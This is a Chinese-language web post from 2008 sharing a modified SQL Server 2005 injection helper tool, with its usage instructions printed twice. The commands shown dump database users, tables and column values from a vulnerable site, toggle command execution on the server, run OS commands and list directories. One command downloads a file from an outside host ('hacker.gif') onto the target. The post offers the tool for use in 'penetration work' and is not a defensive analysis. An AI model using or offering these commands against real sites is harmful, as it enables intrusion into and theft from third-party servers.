Sql2005注入輔助腳本[修改版]
更新時間:2008年11月20日 23:28:06 作者:
經(jīng)過黃瓜修改代碼,功能更加強大了,希望能給大家的滲透工作帶來方便。
程序說明:
+========== =================== ================ ================ =========== +
+ Made By tr4c3,Modified By 無敵小黃瓜【bk瞬間群】 +
+========== =================== ================ ================ =========== +
--------------
url.txt內(nèi)容為:
--------------
比如:http://www.google.com/fuck.asp?id=2<sqlinj點>;--
正在注入的是http://www.xxx.com/index.asp?id=1 <sqlinj點>;--
--------------
參數(shù):
--------------
sql2005 info
sql2005 logbackup
sql2005 users
sql2005 localgroups
sql2005 sqlfile
sql2005 disk
sql2005 pubs clean
sql2005 c:\1.txt mm
sql2005 turn on/off
sql2005 c:\ dir
sql2005 ver cmd
sql2005 "select @@version" query
sql2005 http://fuck.av/hacker.gif c:\1.gif download
sql2005 databases
sql2005 pubs tables
sql2005 pubs authors cols
sql2005 pubs authors au_id values
sql2005 pubs authors au_id id name pass vv
+=====================+
url內(nèi)容 //注意get方式的有個?
http://www.google.com/index.asp?
id=1'
;--
GET
http://www.google.com/index.asp?
id=1'
;--
POST
sql2005.rar
+========== =================== ================ ================ =========== +
+ Made By tr4c3,Modified By 無敵小黃瓜【bk瞬間群】 +
+========== =================== ================ ================ =========== +
--------------
url.txt內(nèi)容為:
--------------
比如:http://www.google.com/fuck.asp?id=2<sqlinj點>;--
正在注入的是http://www.xxx.com/index.asp?id=1 <sqlinj點>;--
--------------
參數(shù):
--------------
sql2005 info
sql2005 logbackup
sql2005 users
sql2005 localgroups
sql2005 sqlfile
sql2005 disk
sql2005 pubs clean
sql2005 c:\1.txt mm
sql2005 turn on/off
sql2005 c:\ dir
sql2005 ver cmd
sql2005 "select @@version" query
sql2005 http://fuck.av/hacker.gif c:\1.gif download
sql2005 databases
sql2005 pubs tables
sql2005 pubs authors cols
sql2005 pubs authors au_id values
sql2005 pubs authors au_id id name pass vv
+=====================+
url內(nèi)容 //注意get方式的有個?
http://www.google.com/index.asp?
id=1'
;--
GET
http://www.google.com/index.asp?
id=1'
;--
POST
sql2005.rar
相關(guān)文章
跨站式腳本(Cross-SiteScripting)XSS攻擊原理分析
XSS又叫CSS (Cross Site Script) ,跨站腳本攻擊。它指的是惡意攻擊者往Web頁面里插入惡意html代碼,當(dāng)用戶瀏覽該頁之時,嵌入其中Web里面的html代碼會被執(zhí)行,從而達(dá)到惡意用戶的特殊目的。2008-09-09
應(yīng)對app或者網(wǎng)站常見幾種攻擊類型方法
這篇文章主要為大家介紹了應(yīng)對app或者網(wǎng)站常見幾種攻擊類型方法,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪2023-11-11

